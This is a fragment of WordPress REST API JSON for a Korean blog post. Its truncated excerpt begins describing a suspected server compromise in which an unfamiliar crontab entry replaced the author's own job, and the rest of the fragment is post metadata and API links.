\ud574\ud0b9\uc774 \uc758\uc2ec\ub418\ub294 \ud604\uc0c1\uc774 \ubc1c\uc0dd\ud588\ub2e4. &nbsp; crontab\uc5d0 \ub0b4\uac00 \ub4f1\ub85d\ud55c job\uc774 \uc5c6\uc5b4 \uc9c0\uace0 \uc544\ub798\uc758 \ud56d\ubaa9\uc774 \ucd94\uac00\ub41c\uac83\uc744 \ud655\uc778\ud558\uace0 \ucc98\uc74c\uc5d0\ub294 \ubcf4\uc548\ud328\uce58\ub97c \ud574\uc11c \uc790\ub3d9\uc73c\ub85c \ub4f1\ub85d\ub418\ub294 job\uc778\uc904 \uc54c\uace0 \ub300\uc18c\ub86d\uac8c \uc5ec\uae30\uc9c0 \uc54a\uace0 \uadf8\ub0e5 \ub118\uc5b4 \uac14\ub294\ub370&#8230; \uc5b4\ub290&#8230; <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[4],"tags":[19,20,18],"_links":{"self":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/683"}],"collection":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=683"}],"version-history":[{"count":24,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/683\/revisions"}],"predecessor-version":[{"id":732,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=\/wp\/v2\/posts\/683\/revisions\/732"}],"wp:attachment":[{"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=683"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=683"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kkoc.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=683"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}